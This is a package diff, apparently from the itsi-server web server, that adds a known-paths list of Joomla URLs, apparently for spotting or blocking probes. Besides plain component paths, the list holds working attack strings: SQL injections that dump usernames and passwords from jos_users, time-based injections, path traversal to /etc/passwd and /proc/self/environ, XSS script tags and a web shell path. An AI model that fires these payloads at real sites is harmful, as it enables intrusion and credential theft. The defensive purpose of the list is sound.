itsi-server 0.1.19 → 0.1.20

data/lib/itsi/server/config/known_paths/webservers-appservers/Joomla_exploitable.txt

@@ -0,0 +1,1937 @@
+&controller=../../../../../../../../../../../../[LFI]%00
+?1.5.10-x
+?1.5.11-x-http_ref
+?1.5.11-x-php-s3lf
+?1.5.3-path-disclose
+?1.5.3-spam
+?1.5.8-x
+?1.5.9-x
+?j1012-fixate-session
+?option=com_mysms&Itemid=0&task=phonebook
+Joomla_1.6.0-Alpha2-Full-Package/components/com_mailto/assets/close-x.png
+admin/
+administrator/
+administrator/components/
+administrator/components/com_a6mambocredits/
+administrator/components/com_a6mambohelpdesk/
+administrator/components/com_admin/admin.admin.html.php
+administrator/components/com_astatspro/refer.php
+administrator/components/com_bayesiannaivefilter/
+administrator/components/com_chronocontact/excelwriter/PPS/File.php
+administrator/components/com_colophon/
+administrator/components/com_colorlab/
+administrator/components/com_comprofiler/
+administrator/components/com_comprofiler/plugin.class.php
+administrator/components/com_cropimage/admin.cropcanvas.php
+administrator/components/com_extplorer/
+administrator/components/com_feederator/includes/tmsp/add_tmsp.php
+administrator/components/com_googlebase/
+administrator/components/com_installer
+administrator/components/com_jcs/
+administrator/components/com_jim/
+administrator/components/com_jjgallery/
+administrator/components/com_joom12pic/
+administrator/components/com_joomla-visites/
+administrator/components/com_joomla_flash_uploader/
+administrator/components/com_joomlaflashfun/
+administrator/components/com_joomlaradiov5/
+administrator/components/com_jpack/
+administrator/components/com_jreactions/
+administrator/components/com_juser/
+administrator/components/com_admin/
+administrator/components/com_kochsuite /
+administrator/components/com_linkdirectory/
+administrator/components/com_livechat/getSavedChatRooms.php
+administrator/components/com_livechat/xmlhttp.php
+administrator/components/com_lurm_constructor/admin.lurm_constructor.php
+administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php?name=lo.php");
+administrator/components/com_mambelfish/
+administrator/components/com_mgm/
+administrator/components/com_mmp/help.mmp.php
+administrator/components/com_mosmedia/
+administrator/components/com_multibanners/extadminmenus.class.php
+administrator/components/com_panoramic/
+administrator/components/com_peoplebook/param.peoplebook.php
+administrator/components/com_phpshop/toolbar.phpshop.html.php
+administrator/components/com_remository/admin.remository.php
+administrator/components/com_serverstat/install.serverstat.php
+administrator/components/com_simpleswfupload/uploadhandler.php");
+administrator/components/com_swmenupro/
+administrator/components/com_treeg/
+administrator/components/com_uhp/
+administrator/components/com_uhp2/
+administrator/components/com_webring/
+administrator/components/com_wmtgallery/
+administrator/components/com_wmtportfolio/
+administrator/components/com_x-shop/
+administrator/index.php?option=com_djartgallery&task=editItem&cid[]=1'+and+1=1+--+
+administrator/index.php?option=com_searchlog&act=log
+ajaxim/
+akocomments.php
+cart?Itemid=[SQLi]
+component/com__brightweblinks/
+component/option,com_jdirectory/task,show_content/contentid,1067/catid,26/directory,1/Itemid,0
+component/osproperty/?task=agent_register
+component/quran/index.php?option=com_quran&action=viewayat&surano=
+components/com_ clickheat/
+components/com_5starhotels/
+components/com_Jambook/jambook.php
+components/com_a6mambocredits/
+components/com_a6mambohelpdesk/
+components/com_ab_gallery/
+components/com_acajoom/
+components/com_acctexp/
+components/com_aclassf/
+components/com_activities/
+components/com_actualite/
+components/com_admin/admin.admin.html.php
+components/com_advancedpoll/
+components/com_agora/
+components/com_agoragroup/
+components/com_ajaxchat/
+components/com_akobook/
+components/com_akocomment/
+components/com_akogallery
+components/com_alberghi/
+components/com_allhotels/
+components/com_alphacontent/
+components/com_altas/
+components/com_amocourse/
+components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php
+components/com_articles/
+components/com_artist/
+components/com_artlinks/
+components/com_asortyment/
+components/com_astatspro/
+components/com_awesom/
+components/com_babackup/
+components/com_banners/
+components/com_bayesiannaivefilter/
+components/com_be_it_easypartner/
+components/com_beamospetition/
+components/com_biblestudy/
+components/com_biblioteca/views/biblioteca/tmpl/pdf.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
+components/com_biblioteca/views/biblioteca/tmpl/stampa.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
+components/com_blog/
+components/com_bookflip/
+components/com_bookjoomlas/
+components/com_booklibrary/
+components/com_books/
+components/com_bsadv/
+components/com_bsq_sitestats/
+components/com_bsq_sitestats/external/rssfeed.php
+components/com_bsqsitestats/
+components/com_calendar/
+components/com_camelcitydb2/
+components/com_candle/
+components/com_casino_blackjack/
+components/com_casino_videopoker/
+components/com_casinobase/
+components/com_catalogproduction/
+components/com_catalogshop/
+components/com_category/
+components/com_cgtestimonial/video.php?url="><script>alert('xss');</script>
+components/com_chronocontact/excelwriter/PPS/File.php
+components/com_cinema/
+components/com_clasifier/
+components/com_classifieds/
+components/com_clickheat/
+components/com_cloner/
+components/com_cmimarketplace/
+components/com_cms/
+components/com_colophon/
+components/com_colorlab/
+components/com_competitions/
+components/com_comprofiler/
+components/com_comprofiler/plugin.class.php
+components/com_contactinfo/
+components/com_content/
+components/com_cpg/cpg.php
+components/com_cropimage/admin.cropcanvas.php
+components/com_custompages/
+components/com_cx/
+components/com_d3000/
+components/com_dadamail/
+components/com_dailymessage/
+components/com_datsogallery/
+components/com_dbquery/
+components/com_detail/
+components/com_digistore/
+components/com_directory/
+components/com_djiceshoutbox/
+components/com_doc/
+components/com_downloads/
+components/com_ds-syndicate/
+components/com_dtregister/
+components/com_dv/externals/phpupload/upload.php");
+components/com_easybook/
+components/com_emcomposer/
+components/com_equotes/
+components/com_estateagent/
+components/com_eventing/
+components/com_eventlist/
+components/com_events/
+components/com_ewriting/
+components/com_expose/uploadimg.php
+components/com_expshop/
+components/com_extcalendar/
+components/com_extcalendar/cal_popup.php?extmode=view&extid=
+components/com_extcalendar/extcalendar.php
+components/com_extended_registration/registration_detailed.inc.php
+components/com_extplorer/
+components/com_ezine/
+components/com_ezstore/
+components/com_facileforms/
+components/com_fantasytournament/
+components/com_faq/
+components/com_feederator/includes/tmsp/add_tmsp.php
+components/com_filebase/
+components/com_filiale/
+components/com_flashfun/
+components/com_flashmagazinedeluxe/
+components/com_flippingbook/
+components/com_flyspray/startdown.php
+components/com_fm/fm.install.php
+components/com_foevpartners/
+components/com_football/
+components/com_formtool/
+components/com_forum/
+components/com_fq/
+components/com_fundraiser/
+components/com_galeria/
+components/com_galleria/galleria.html.php
+components/com_gallery/
+components/com_game/
+components/com_gameq/
+components/com_garyscookbook/
+components/com_genealogy/
+components/com_geoboerse/
+components/com_gigcal/
+components/com_gmaps/
+components/com_googlebase/
+components/com_gsticketsystem/
+components/com_guide/
+components/com_hashcash/server.php
+components/com_hbssearch/
+components/com_hello_world/
+components/com_hotproperties/
+components/com_hotproperty/
+components/com_hotspots/
+components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php
+components/com_hwdvideoshare/
+components/com_hwdvideoshare/assets/uploads/flash/flash_upload.php?jqUploader=1");
+components/com_ice/
+components/com_idoblog/
+components/com_idvnews/
+components/com_ignitegallery/
+components/com_ijoomla_archive/
+components/com_ijoomla_rss/
+components/com_inter/
+components/com_ionfiles/
+components/com_is/
+components/com_ixxocart/
+components/com_jabode/
+components/com_jashowcase/
+components/com_jb2/
+components/com_jce/
+components/com_jcs/
+components/com_jd-wiki/
+components/com_jd-wp/
+components/com_jim/
+components/com_jjgallery/
+components/com_jmovies/
+components/com_jobline/
+components/com_jombib/
+components/com_joobb/
+components/com_jooget/
+components/com_joom12pic/
+components/com_joomla-visites/
+components/com_joomla_flash_uploader/
+components/com_joomlaboard/
+components/com_joomladate/ 
+components/com_joomlaflashfun/
+components/com_joomlalib/
+components/com_joomlaradiov5/
+components/com_joomlavvz/
+components/com_joomlaxplorer/
+components/com_joomloads/
+components/com_joomradio/
+components/com_joomtracker/
+components/com_joovideo/
+components/com_jotloader/
+components/com_journal/
+components/com_jpack/
+components/com_jpad/
+components/com_jreactions/
+components/com_jreviews/scripts/xajax.inc.php
+components/com_jumi/
+components/com_juser/
+components/com_jvideo/
+components/com_k2/
+components/com_kbase/
+components/com_knowledgebase/fckeditor/fckeditor.js
+components/com_kochsuite /
+components/com_kunena/
+components/com_letterman/
+components/com_lexikon/
+components/com_linkdirectory/
+components/com_listoffreeads/
+components/com_livechat/getSavedChatRooms.php
+components/com_livechat/xmlhttp.php
+components/com_liveticker/
+components/com_lm/
+components/com_lmo/
+components/com_loudmounth/includes/abbc/abbc.class.php
+components/com_loudmouth/
+components/com_lowcosthotels/
+components/com_lurm_constructor/admin.lurm_constructor.php
+components/com_mad4joomla/
+components/com_madeira/img.php
+components/com_maianmusic/
+components/com_mailarchive/
+components/com_mailto/
+components/com_mambatstaff/mambatstaff.php
+components/com_mambelfish/
+components/com_mambospgm/
+components/com_mambowiki/MamboLogin.php
+components/com_marketplace/
+components/com_mcquiz/
+components/com_mdigg/
+components/com_media_library/
+components/com_mediaslide/
+components/com_mezun/
+components/com_mgm/
+components/com_minibb/
+components/com_misterestate/
+components/com_mmp/help.mmp.php
+components/com_model/
+components/com_moodle/moodle.php
+components/com_moofaq/
+components/com_mosmedia/
+components/com_mospray/scripts/admin.php
+components/com_mosres/
+components/com_most/
+components/com_mp3_allopass/
+components/com_mtree/
+components/com_mtree/img/listings/o/{id}.php
+components/com_multibanners/extadminmenus.class.php
+components/com_myalbum/
+components/com_mycontent/
+components/com_mydyngallery/
+components/com_mygallery/
+components/com_n-forms/
+components/com_na_content/
+components/com_na_mydocs/
+components/com_na_newsdescription/
+components/com_na_qforms/
+components/com_neogallery/
+components/com_neorecruit/
+components/com_neoreferences/
+components/com_netinvoice/
+components/com_news/
+components/com_news_portal/
+components/com_newsflash/
+components/com_nfn_addressbook/
+components/com_nicetalk/
+components/com_noticias/
+components/com_omnirealestate/
+components/com_omphotogallery/
+components/com_ongumatimesheet20/
+components/com_onlineflashquiz/
+components/com_ownbiblio/
+components/com_panoramic/
+components/com_paxgallery/
+components/com_paxxgallery/
+components/com_pcchess/
+components/com_pcchess/include.pcchess.php
+components/com_pccookbook/
+components/com_pccookbook/pccookbook.php
+components/com_peoplebook/param.peoplebook.php
+components/com_performs/
+components/com_philaform/
+components/com_phocadocumentation/
+components/com_php/
+components/com_phpshop/toolbar.phpshop.html.php
+components/com_pinboard/
+components/com_pms/
+components/com_poll/
+components/com_pollxt/
+components/com_ponygallery/
+components/com_portafolio/
+components/com_portfol/
+components/com_prayercenter/
+components/com_pro_desk/
+components/com_prod/
+components/com_productshowcase/
+components/com_profiler/
+components/com_projectfork/
+components/com_propertylab/
+components/com_puarcade/
+components/com_publication/
+components/com_quiz/
+components/com_rapidrecipe/
+components/com_rdautos/
+components/com_realestatemanager/
+components/com_recly/
+components/com_referenzen/
+components/com_rekry/
+components/com_remository/admin.remository.php
+components/com_remository_files/file_image_14/1276100016shell.php
+components/com_reporter/processor/reporter.sql.php
+components/com_resman/
+components/com_restaurante/
+components/com_ricette/
+components/com_rsfiles/
+components/com_rsgallery/
+components/com_rsgallery2/
+components/com_rss/
+components/com_rssreader/
+components/com_rssxt/
+components/com_rwcards/
+components/com_school/
+components/com_search/
+components/com_sebercart/getPic.php?p=[LFD]%00
+components/com_securityimages/
+components/com_sef/
+components/com_seminar/
+components/com_serverstat/install.serverstat.php
+components/com_sg/
+components/com_simple_review/
+components/com_simpleboard/
+components/com_simplefaq/
+components/com_simpleshop/
+components/com_sitemap/sitemap.xml.php
+components/com_slideshow/
+components/com_smf/
+components/com_smf/smf.php
+components/com_swmenupro/
+components/com_team/
+components/com_tech_article/
+components/com_thopper/
+components/com_thyme/
+components/com_tickets/
+components/com_tophotelmodule/
+components/com_tour_toto/
+components/com_trade/
+components/com_uhp/
+components/com_uhp2/
+components/com_user/controller.php
+components/com_users/
+components/com_utchat/pfc/lib/pear/PHPUnit/GUI/Gtk.php
+components/com_vehiclemanager/
+components/com_versioning /
+components/com_videodb/core/videodb.class.xml.php
+components/com_virtuemart/
+components/com_volunteer/
+components/com_vr/
+components/com_waticketsystem/
+components/com_webhosting/
+components/com_weblinks/
+components/com_webring/
+components/com_wmtgallery/
+components/com_wmtportfolio/
+components/com_x-shop/
+components/com_xevidmegahd/
+components/com_xewebtv/
+components/com_xfaq/
+components/com_xgallery/helpers/img.php?file=
+components/com_xsstream-dm/
+components/com_ynews/
+components/com_yvcomment/
+components/com_zoom/classes/
+components/mod_letterman/
+components/remository/
+eXtplorer/
+easyblog/entry/uncategorized
+extplorer/
+components/com_mtree/img/listings/o/{id}.php where {id}
+includes/joomla.php
+index.php/404'
+index.php/?option=com_question&catID=21' and+1=0 union all
+index.php/image-gallery/"><script>alert('xss')</script>/25-koala
+index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip&amp;type=css&v=1
+index.php?option=com_aardvertiser&cat_name=Vehicles'+AND+'1'='1&task=view
+index.php?option=com_aardvertiser&cat_name=conf&task=<=
+index.php?option=com_aardvertiser&task=
+index.php?option=com_abc&view=abc&letter=AS&sectionid='
+index.php?option=com_advert&id=36'
+index.php?option=com_alameda&controller=comments&task=edit&storeid=-1+union+all+select+concat_ws(0x3a,username,password)+from+jos_users--
+index.php?option=com_alfurqan15x&action=viewayat&surano=
+index.php?option=com_amblog&view=amblog&catid=-1 UNION SELECT @@version
+index.php?option=com_annonces&view=edit&Itemid=1
+index.php?option=com_articleman&task=new
+index.php?option=com_bbs&bid=-1
+index.php?option=com_beamospetition&startpage=3&pet=-
+index.php?option=com_beamospetition&startpage=3&pet=-1+Union+select+user()+from+jos_users-
+index.php?option=com_bearleague&task=team&tid=8&sid=1&Itemid=%27
+index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00
+index.php?option=com_biblioteca&view=biblioteca&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
+index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00
+index.php?option=com_bnf&task=listar&action=filter_add&seccion=pago&seccion_id=-1
+index.php?option=com_camelcitydb2&id=-3+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11+from+jos_users--
+index.php?option=com_chronoconnectivity&itemid=1
+index.php?option=com_chronocontact&itemid=1
+index.php?option=com_cinema&Itemid=S@BUN&func=detail&id=
+index.php?option=com_clantools&squad=1+
+index.php?option=com_clantools&task=clanwar&showgame=1+
+index.php?option=com_commedia&format=raw&task=image&pid=4&id=964'
+index.php?option=com_commedia&task=page&commpid=21
+index.php?option=com_connect&view=connect&controller=
+index.php?option=com_content&view=article&id=[A VALID ID]&Itemid=[A VALID ID]&sflaction=dir&sflDir=../../../
+index.php?option=com_delicious&controller=../../../../../../../../../../etc/passwd%00
+index.php?option=com_dioneformwizard&controller=[LFI]%00
+index.php?option=com_discussions&view=thread&catid=[Correct CatID]&thread=-1
+index.php?option=com_dshop&controller=fpage&task=flypage&idofitem=12
+index.php?option=com_easyfaq&Itemid=1&task=view&gid=
+index.php?option=com_easyfaq&catid=1&task=view&id=-2527+
+index.php?option=com_easyfaq&task=view&contact_id=
+index.php?option=com_elite_experts&task=showExpertProfileDetailed&getExpertsFromCountry=&language=ru&id=
+index.php?option=com_equipment&task=components&id=45&sec_men_id=
+index.php?option=com_equipment&view=details&id=
+index.php?option=com_estateagent&Itemid=47&act=object&task=showEO&id=[sqli]
+index.php?option=com_etree&view=displays&layout=category&id=[SQL]
+index.php?option=com_etree&view=displays&layout=user&user_id=[SQL]
+index.php?option=com_ezautos&Itemid=49&id=1&task=helpers&firstCode=1
+index.php?option=com_fabrik&view=table&tableid=13+union+select+1----
+index.php?option=com_filecabinet&task=download&cid[]=7
+index.php?option=com_firmy&task=section_show_set&Id=-1
+index.php?option=com_fss&view=test&prodid=777777.7'+union+all+select+77777777777777%2C77777777777777%2C77777777777777%2Cversion()%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777--+D4NB4R
+index.php?option=com_golfcourseguide&view=golfcourses&cid=1&id=
+index.php?option=com_graphics&controller=
+index.php?option=com_grid&gid=15_ok_0',%20'15_ok_0&data_search=
+index.php?option=com_grid&gid=15_ok_0',%20'15_ok_0?data_search=&rpp=
+index.php?option=com_huruhelpdesk&view=detail
+index.php?option=com_huruhelpdesk&view=detail&cid[0]=
+index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1
+index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=1 
+index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=2 
+index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id[]=1
+index.php?option=com_iproperty&view=agentproperties&id=
+index.php?option=com_jacomment&view=
+index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00
+index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00
+index.php?option=com_jcommunity&controller=members&task=1'
+index.php?option=com_jeajaxeventcalendar&view=alleventlist_more&event_id=-13
+index.php?option=com_jefaqpro&view=category&layout=categorylist&catid=2
+index.php?option=com_jefaqpro&view=category&layout=categorylist&task=lists&catid=2
+index.php?option=com_jeguestbook&view=../../../../../../../../etc/passwd%00
+index.php?option=com_jeguestbook&view=item_detail&d_itemid=-1 OR (SELECT(IF(0x41=0x41, BENCHMARK(999999999,NULL),NULL)))
+index.php?option=com_jfuploader&Itemid=
+index.php?option=com_jgen&task=view&id=
+index.php?option=com_jgrid&controller=../../../../../../../../etc/passwd%00
+index.php?option=com_jimtawl&Itemid=12&task=
+index.php?option=com_jmarket&controller=product&task=1'
+index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=1'
+index.php?option=com_jomdirectory&task=search&type=111+
+index.php?option=com_joomdle&view=detail&cat_id=1&course_id=
+index.php?option=com_joomla_flash_uploader&Itemid=1
+index.php?option=com_joomleague&func=showNextMatch&p=[sqli]
+index.php?option=com_joomleague&view=resultsmatrix&p=4&Itemid=[sqli]
+index.php?option=com_joomtouch&controller=
+index.php?option=com_jphone&controller../../../../../../../../../../etc/passwd%00
+index.php?option=com_jphone&controller../../../../../../../../../../proc/self/environ%00
+index.php?option=com_jscalendar&view=jscalendar&task=details&ev_id=999 UNION SELECT 1,username,password,4,5,6,7,8 FROM jos_users
+index.php?option=com_jstore&controller=product-display&task=1'
+index.php?option=com_jsubscription&controller=subscription&task=1'
+index.php?option=com_jtickets&controller=ticket&task=1'
+index.php?option=com_konsultasi&act=detail&sid=
+index.php?option=com_ksadvertiser&Itemid=36&task=add&catid=0&lang=en
+index.php?option=com_kunena&func=userlist&search=
+index.php?option=com_lead&task=display&archive=1&Itemid=65&leadstatus=1'
+index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00
+index.php?option=com_markt&page=show_category&catid=7+union+select+0,1,password,3,4,5,username,7,8+from+jos_users--
+index.php?option=com_matamko&controller=
+index.php?option=com_myhome&task=4&nidimmindex.php?option=com_myhome&task=4&nidimm
+index.php?option=com_neorecruit&task=offer_view&id=
+index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users--
+index.php?option=com_noticeboard&controller=
+index.php?option=com_obsuggest&controller=
+index.php?option=com_ongallery&task=ft&id=-1+order+by+1--
+index.php?option=com_ongallery&task=ft&id=-1+union+select+1--
+index.php?option=com_oziogallery&Itemid=
+index.php?option=com_page&id=53
+index.php?option=com_pbbooking&task=validate&id=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(999999999,NULL),NULL)))
+index.php?option=com_pcchess&controller=../../../../../../../../../../../../../etc/passwd%00
+index.php?option=com_peliculas&view=peliculas&id=null[Sql Injection]
+index.php?option=com_phocagallery&view=categories&Itemid=
+index.php?option=com_photomapgallery&view=imagehandler&folder=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
+index.php?option=com_php&file=../../../../../../../../../../etc/passwd
+index.php?option=com_php&file=../images/phplogo.jpg
+index.php?option=com_php&file=../js/ie_pngfix.js
+index.php?option=com_ponygallery&Itemid=[sqli]
+index.php?option=com_products&catid=-1
+index.php?option=com_products&id=-1
+index.php?option=com_products&product_id=-1
+index.php?option=com_products&task=category&catid=-1
+index.php?option=com_properties&task=agentlisting&aid=
+index.php?option=com_qcontacts&Itemid=1'
+index.php?option=com_qcontacts?=catid=0&filter_order=[SQLi]&filter_order_Dir=&option=com_qcontacts
+index.php?option=com_record&controller=../../../../../../../../../../etc/passwd%00
+index.php?option=com_restaurantguide&view=country&id='&Itemid=69
+index.php?option=com_rokmodule&tmpl=component&type=raw&module=1'
+index.php?option=com_seyret&view=
+index.php?option=com_simpleshop&Itemid=26&task=viewprod&id=-999.9 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,concat(username,0x3e,password,0x3e,usertype,0x3e,lastvisitdate)+from+jos_users--
+index.php?option=com_smartsite&controller=
+index.php?option=com_spa&view=spa_product&cid=
+index.php?option=com_spidercalendar
+index.php?option=com_spidercalendar&date=1'
+index.php?option=com_spielothek&task=savebattle&bid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
+index.php?option=com_spielothek&view=battle&wtbattle=ddbdelete&dbtable=vS&loeschen[0]=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
+index.php?option=com_spielothek&view=battle&wtbattle=play&bid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
+index.php?option=com_staticxt&staticfile=test.php&id=1923
+index.php?option=com_szallasok&mode=8&id=25 (SQL)
+index.php?option=com_tag&task=tag&tag=
+index.php?option=com_timereturns&view=timereturns&id=7+union+all+select+concat_ws(0x3a,username,password),2,3,4,5,6+from+jos_users--
+index.php?option=com_timetrack&view=timetrack&ct_id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,CONCAT(username,0x3A,password) FROM jos_users
+index.php?option=com_ultimateportfolio&controller=
+index.php?option=com_users&view=registration
+index.php?option=com_virtuemart&page=account.index&keyword=[sqli]
+index.php?option=com_worldrates&controller=../../../../../../../../../../etc/passwd%00
+index.php?option=com_x-shop&action=artdetail&idd='
+index.php?option=com_x-shop&action=artdetail&idd='[SQLi]
+index.php?option=com_xcomp&controller=../../[LFI]%00
+index.php?option=com_xvs&controller=../../[LFI]%00
+index.php?option=com_yellowpages&cat=-1923+UNION+SELECT 1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+jos_users--+Union+select+user()+from+jos_users--
+index.php?option=com_yjcontactus&view=
+index.php?option=com_youtube&id_cate=4
+index.php?option=com_zina&view=zina&Itemid=9
+index.php?option=com_zoomportfolio&view=portfolio&view=portfolio&id=
+index.php?search=NoGe&option=com_esearch&searchId=
+index.php?view=videos&type=member&user_id=-62+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat(username,0x3a,password),14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+jos_users--&option=com_jomtube
+index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7+from+jos_users--
+js/index.php?option=com_socialads&view=showad&Itemid=94
+libraries/joomla/utilities/compat/php50x.php
+libraries/pcl/pcltar.php
+libraries/phpmailer/phpmailer.php
+libraries/phpxmlrpc/xmlrpcs.php
+modules/mod_artuploader/upload.php");
+modules/mod_as_category.php
+modules/mod_calendar.php
+modules/mod_ccnewsletter/helper/popup.php?id=[SQLi]
+modules/mod_dionefileuploader/upload.php?module_dir=./&module_max=2097152&file_type=application/octet-stream");
+modules/mod_jfancy/script.php");
+modules/mod_ppc_simple_spotlight/elements/upload_file.php
+modules/mod_ppc_simple_spotlight/img/
+modules/mod_pxt/
+modules/mod_quick_question.php
+modules/mod_visitorsgooglemap/map_data.php?action=listpoints&lastMarkerID=0
+patch/makedown.php?arquivo=../../../../etc/passwd
+plugins/content/efup_files/helper.php");
+plugins/editors/idoeditor/themes/advanced/php/image.php" method="post" enctype="multipart/form-data">
+plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/
+plugins/editors/xstandard/attachmentlibrary.php
+print.php?task=person&id=36 and 1=1
+templates/be2004-2/
+templates/ja_purity/
+wap/wapmain.php?option=onews&action=link&id=-154+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users+limit+0,1--
+web/index.php?option=com_rokmodule&tmpl=component&type=raw&module=1'&controller=../../../../../../../../../../../../[LFI]%00
+?1.5.10-x
+?1.5.11-x-http_ref
+?1.5.11-x-php-s3lf
+?1.5.3-path-disclose
+?1.5.3-spam
+?1.5.8-x
+?1.5.9-x
+?j1012-fixate-session
+?option=com_mysms&Itemid=0&task=phonebook
+Joomla_1.6.0-Alpha2-Full-Package/components/com_mailto/assets/close-x.png
+admin/
+administrator/
+administrator/components/
+administrator/components/com_a6mambocredits/
+administrator/components/com_a6mambohelpdesk/
+administrator/components/com_admin/admin.admin.html.php
+administrator/components/com_astatspro/refer.php
+administrator/components/com_bayesiannaivefilter/
+administrator/components/com_chronocontact/excelwriter/PPS/File.php
+administrator/components/com_colophon/
+administrator/components/com_colorlab/
+administrator/components/com_comprofiler/
+administrator/components/com_comprofiler/plugin.class.php
+administrator/components/com_cropimage/admin.cropcanvas.php
+administrator/components/com_extplorer/
+administrator/components/com_feederator/includes/tmsp/add_tmsp.php
+administrator/components/com_googlebase/
+administrator/components/com_installer
+administrator/components/com_jcs/
+administrator/components/com_jim/
+administrator/components/com_jjgallery/
+administrator/components/com_joom12pic/
+administrator/components/com_joomla-visites/
+administrator/components/com_joomla_flash_uploader/
+administrator/components/com_joomlaflashfun/
+administrator/components/com_joomlaradiov5/
+administrator/components/com_jpack/
+administrator/components/com_jreactions/
+administrator/components/com_juser/
+administrator/components/com_admin/
+administrator/components/com_kochsuite /
+administrator/components/com_linkdirectory/
+administrator/components/com_livechat/getSavedChatRooms.php
+administrator/components/com_livechat/xmlhttp.php
+administrator/components/com_lurm_constructor/admin.lurm_constructor.php
+administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php?name=lo.php");
+administrator/components/com_mambelfish/
+administrator/components/com_mgm/
+administrator/components/com_mmp/help.mmp.php
+administrator/components/com_mosmedia/
+administrator/components/com_multibanners/extadminmenus.class.php
+administrator/components/com_panoramic/
+administrator/components/com_peoplebook/param.peoplebook.php
+administrator/components/com_phpshop/toolbar.phpshop.html.php
+administrator/components/com_remository/admin.remository.php
+administrator/components/com_serverstat/install.serverstat.php
+administrator/components/com_simpleswfupload/uploadhandler.php");
+administrator/components/com_swmenupro/
+administrator/components/com_treeg/
+administrator/components/com_uhp/
+administrator/components/com_uhp2/
+administrator/components/com_webring/
+administrator/components/com_wmtgallery/
+administrator/components/com_wmtportfolio/
+administrator/components/com_x-shop/
+administrator/index.php?option=com_djartgallery&task=editItem&cid[]=1'+and+1=1+--+
+administrator/index.php?option=com_searchlog&act=log
+ajaxim/
+akocomments.php
+cart?Itemid=[SQLi]
+component/com__brightweblinks/
+component/option,com_jdirectory/task,show_content/contentid,1067/catid,26/directory,1/Itemid,0
+component/osproperty/?task=agent_register
+component/quran/index.php?option=com_quran&action=viewayat&surano=
+components/com_ clickheat/
+components/com_5starhotels/
+components/com_Jambook/jambook.php
+components/com_a6mambocredits/
+components/com_a6mambohelpdesk/
+components/com_ab_gallery/
+components/com_acajoom/
+components/com_acctexp/
+components/com_aclassf/
+components/com_activities/
+components/com_actualite/
+components/com_admin/admin.admin.html.php
+components/com_advancedpoll/
+components/com_agora/
+components/com_agoragroup/
+components/com_ajaxchat/
+components/com_akobook/
+components/com_akocomment/
+components/com_akogallery
+components/com_alberghi/
+components/com_allhotels/
+components/com_alphacontent/
+components/com_altas/
+components/com_amocourse/
+components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php
+components/com_articles/
+components/com_artist/
+components/com_artlinks/
+components/com_asortyment/
+components/com_astatspro/
+components/com_awesom/
+components/com_babackup/
+components/com_banners/
+components/com_bayesiannaivefilter/
+components/com_be_it_easypartner/
+components/com_beamospetition/
+components/com_biblestudy/
+components/com_biblioteca/views/biblioteca/tmpl/pdf.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
+components/com_biblioteca/views/biblioteca/tmpl/stampa.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
+components/com_blog/
+components/com_bookflip/
+components/com_bookjoomlas/
+components/com_booklibrary/
+components/com_books/
+components/com_bsadv/
+components/com_bsq_sitestats/
+components/com_bsq_sitestats/external/rssfeed.php
+components/com_bsqsitestats/
+components/com_calendar/
+components/com_camelcitydb2/
+components/com_candle/
+components/com_casino_blackjack/
+components/com_casino_videopoker/
+components/com_casinobase/
+components/com_catalogproduction/
+components/com_catalogshop/
+components/com_category/
+components/com_cgtestimonial/video.php?url="><script>alert('xss');</script>
+components/com_chronocontact/excelwriter/PPS/File.php
+components/com_cinema/
+components/com_clasifier/
+components/com_classifieds/
+components/com_clickheat/
+components/com_cloner/
+components/com_cmimarketplace/
+components/com_cms/
+components/com_colophon/
+components/com_colorlab/
+components/com_competitions/
+components/com_comprofiler/
+components/com_comprofiler/plugin.class.php
+components/com_contactinfo/
+components/com_content/
+components/com_cpg/cpg.php
+components/com_cropimage/admin.cropcanvas.php
+components/com_custompages/
+components/com_cx/
+components/com_d3000/
